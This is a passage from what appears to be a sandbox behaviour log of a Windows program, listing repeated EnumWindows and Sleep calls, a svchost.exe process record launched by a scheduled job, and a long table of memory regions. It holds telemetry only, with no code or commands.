lParam=0x410000) [0301.479] Sleep (dwMilliseconds=0x64) [0301.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.497] Sleep (dwMilliseconds=0x64) [0301.544] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.546] Sleep (dwMilliseconds=0x64) [0301.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.564] Sleep (dwMilliseconds=0x64) [0301.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.605] Sleep (dwMilliseconds=0x64) [0301.643] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.645] Sleep (dwMilliseconds=0x64) [0301.667] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.670] Sleep (dwMilliseconds=0x64) [0301.685] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.688] Sleep (dwMilliseconds=0x64) [0301.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.726] Sleep (dwMilliseconds=0x64) [0301.763] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.765] Sleep (dwMilliseconds=0x64) [0301.768] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.770] Sleep (dwMilliseconds=0x64) [0301.823] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.828] Sleep (dwMilliseconds=0x64) [0301.875] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.877] Sleep (dwMilliseconds=0x64) [0301.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.879] Sleep (dwMilliseconds=0x64) [0301.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.918] Sleep (dwMilliseconds=0x64) [0301.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.991] Sleep (dwMilliseconds=0x64) [0302.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.071] Sleep (dwMilliseconds=0x64) [0302.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.112] Sleep (dwMilliseconds=0x64) [0302.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.152] Sleep (dwMilliseconds=0x64) [0302.159] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.161] Sleep (dwMilliseconds=0x64) [0302.191] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.231] Sleep (dwMilliseconds=0x64) [0302.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.256] Sleep (dwMilliseconds=0x64) [0302.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.272] Sleep (dwMilliseconds=0x64) [0302.320] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.322] Sleep (dwMilliseconds=0x64) [0302.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.359] Sleep (dwMilliseconds=0x64) [0302.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.374] Sleep (dwMilliseconds=0x64) [0302.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.412] Sleep (dwMilliseconds=0x64) [0302.446] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.448] Sleep (dwMilliseconds=0x64) [0302.451] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.453] Sleep (dwMilliseconds=0x64) [0302.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.491] Sleep (dwMilliseconds=0x64) [0302.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.528] Sleep (dwMilliseconds=0x64) [0302.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.532] Sleep (dwMilliseconds=0x64) [0302.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.639] Sleep (dwMilliseconds=0x64) [0302.682] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.684] Sleep (dwMilliseconds=0x64) [0302.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.693] Sleep (dwMilliseconds=0x64) [0302.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.732] Sleep (dwMilliseconds=0x64) [0302.766] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.768] Sleep (dwMilliseconds=0x64) [0302.776] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.815] Sleep (dwMilliseconds=0x64) [0302.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.856] Sleep (dwMilliseconds=0x64) [0302.857] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.858] Sleep (dwMilliseconds=0x64) [0302.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.896] Sleep (dwMilliseconds=0x64) [0302.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0302.935] Sleep (dwMilliseconds=0x64) [0303.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.007] Sleep (dwMilliseconds=0x64) [0303.049] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.051] Sleep (dwMilliseconds=0x64) [0303.070] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.071] Sleep (dwMilliseconds=0x64) [0303.094] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.096] Sleep (dwMilliseconds=0x64) [0303.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.134] Sleep (dwMilliseconds=0x64) [0303.165] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.167] Sleep (dwMilliseconds=0x64) [0303.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.178] Sleep (dwMilliseconds=0x64) [0303.220] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.265] Sleep (dwMilliseconds=0x64) [0303.303] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.304] Sleep (dwMilliseconds=0x64) [0303.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.328] Sleep (dwMilliseconds=0x64) [0303.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.358] Sleep (dwMilliseconds=0x64) [0303.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.396] Sleep (dwMilliseconds=0x64) [0303.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.408] Sleep (dwMilliseconds=0x64) [0303.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.476] Sleep (dwMilliseconds=0x64) [0303.500] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.501] Sleep (dwMilliseconds=0x64) [0303.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.518] Sleep (dwMilliseconds=0x64) [0303.555] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.556] Sleep (dwMilliseconds=0x64) [0303.612] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.613] Sleep (dwMilliseconds=0x64) [0303.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.649] Sleep (dwMilliseconds=0x64) [0303.684] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.685] Sleep (dwMilliseconds=0x64) [0303.697] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.698] Sleep (dwMilliseconds=0x64) [0303.733] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.735] Sleep (dwMilliseconds=0x64) [0303.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.771] Sleep (dwMilliseconds=0x64) [0303.781] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.782] Sleep (dwMilliseconds=0x64) [0303.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.812] Sleep (dwMilliseconds=0x64) [0303.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.851] Sleep (dwMilliseconds=0x64) [0303.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.861] Sleep (dwMilliseconds=0x64) [0303.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.895] Sleep (dwMilliseconds=0x64) [0303.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.933] Sleep (dwMilliseconds=0x64) [0303.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.950] Sleep (dwMilliseconds=0x64) [0303.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0303.985] Sleep (dwMilliseconds=0x64) [0304.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.023] Sleep (dwMilliseconds=0x64) [0304.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.042] Sleep (dwMilliseconds=0x64) [0304.063] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.064] Sleep (dwMilliseconds=0x64) [0304.104] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.106] Sleep (dwMilliseconds=0x64) [0304.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.121] Sleep (dwMilliseconds=0x64) [0304.154] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.193] Sleep (dwMilliseconds=0x64) [0304.212] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.213] Sleep (dwMilliseconds=0x64) [0304.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.235] Sleep (dwMilliseconds=0x64) [0304.273] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.274] Sleep (dwMilliseconds=0x64) [0304.304] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.305] Sleep (dwMilliseconds=0x64) [0304.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.328] Sleep (dwMilliseconds=0x64) [0304.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.366] Sleep (dwMilliseconds=0x64) [0304.393] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.394] Sleep (dwMilliseconds=0x64) [0304.409] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.410] Sleep (dwMilliseconds=0x64) [0304.447] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.448] Sleep (dwMilliseconds=0x64) [0304.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.471] Sleep (dwMilliseconds=0x64) [0304.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.487] Sleep (dwMilliseconds=0x64) [0304.523] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.524] Sleep (dwMilliseconds=0x64) [0304.539] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.540] Sleep (dwMilliseconds=0x64) [0304.602] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.603] Sleep (dwMilliseconds=0x64) [0304.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.669] Sleep (dwMilliseconds=0x64) [0304.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.680] Sleep (dwMilliseconds=0x64) [0304.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.721] Sleep (dwMilliseconds=0x64) [0304.752] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.752] Sleep (dwMilliseconds=0x64) [0304.758] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.759] Sleep (dwMilliseconds=0x64) [0304.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.802] Sleep (dwMilliseconds=0x64) [0304.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.827] Sleep (dwMilliseconds=0x64) [0304.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.842] Sleep (dwMilliseconds=0x64) [0304.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.878] Sleep (dwMilliseconds=0x64) [0304.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.893] Sleep (dwMilliseconds=0x64) [0304.954] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0304.955] Sleep (dwMilliseconds=0x64) [0305.002] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.004] Sleep (dwMilliseconds=0x64) [0305.040] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.041] Sleep (dwMilliseconds=0x64) [0305.078] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.080] Sleep (dwMilliseconds=0x64) [0305.116] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.117] Sleep (dwMilliseconds=0x64) [0305.157] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.158] Sleep (dwMilliseconds=0x64) [0305.168] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.169] Sleep (dwMilliseconds=0x64) [0305.197] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.198] Sleep (dwMilliseconds=0x64) [0305.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.237] Sleep (dwMilliseconds=0x64) [0305.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.258] Sleep (dwMilliseconds=0x64) [0305.278] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.279] Sleep (dwMilliseconds=0x64) [0305.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.329] Sleep (dwMilliseconds=0x64) [0305.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.365] Sleep (dwMilliseconds=0x64) [0305.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.371] Sleep (dwMilliseconds=0x64) [0305.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.408] Sleep (dwMilliseconds=0x64) [0305.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.460] Sleep (dwMilliseconds=0x64) [0305.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.476] Sleep (dwMilliseconds=0x64) [0305.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0305.505] Sleep (dwMilliseconds=0x64) [0305.756] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0308.199] Sleep (dwMilliseconds=0x64) [0308.299] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0308.300] Sleep (dwMilliseconds=0x64) Thread: id = 51 os_tid = 0x8bc Thread: id = 137 os_tid = 0xddc Thread: id = 138 os_tid = 0xa6c Thread: id = 139 os_tid = 0xd24 Thread: id = 140 os_tid = 0xa8c Thread: id = 141 os_tid = 0xd14 Thread: id = 142 os_tid = 0xd04 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75fd1000" os_pid = "0x344" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a36c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2185 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2186 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2187 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2188 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2189 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2190 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2191 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2192 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2193 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2194 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2195 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2196 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2197 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2198 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2199 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2200 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2201 start_va = 0x550000 end_va = 0x551fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2202 start_va = 0x560000 end_va = 0x560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 2203 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2204 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2205 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2206 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2207 start_va = 0x660000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2208 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2209 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2210 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2211 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2212 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2213 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 2214 start_va = 0x7e0000 end_va = 0x7e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2215 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2216 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2217 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2218 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 2219 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2220 start_va = 0x10a0000 end_va = 0x10a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2221 start_va = 0x10b0000 end_va = 0x10b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2222 start_va = 0x10e0000 end_va = 0x10e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2223 start_va = 0x10f0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2224 start_va = 0x11f0000 end_va = 0x11f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 2225 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2226 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2227 start_va = 0x1400000 end_va = 0x1736fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2228 start_va = 0x1740000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 2229 start_va = 0x1840000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 2230 start_va = 0x1940000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 2231 start_va = 0x19c0000 end_va = 0x19d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 2232 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2233 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 2234 start_va = 0x1c00000 end_va = 0x1cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2235 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2236 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2237 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2238 start_va = 0x2000000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2239 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 2240 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2241 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2242 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2243 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2244 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2245 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2246 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2247 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2248 start_va = 0x2900000 end_va = 0x2944fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2249 start_va = 0x2950000 end_va = 0x29ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2250 start_va = 0x29e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 2251 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2252 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2253 start_va = 0x2c80000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 2254 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2255 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 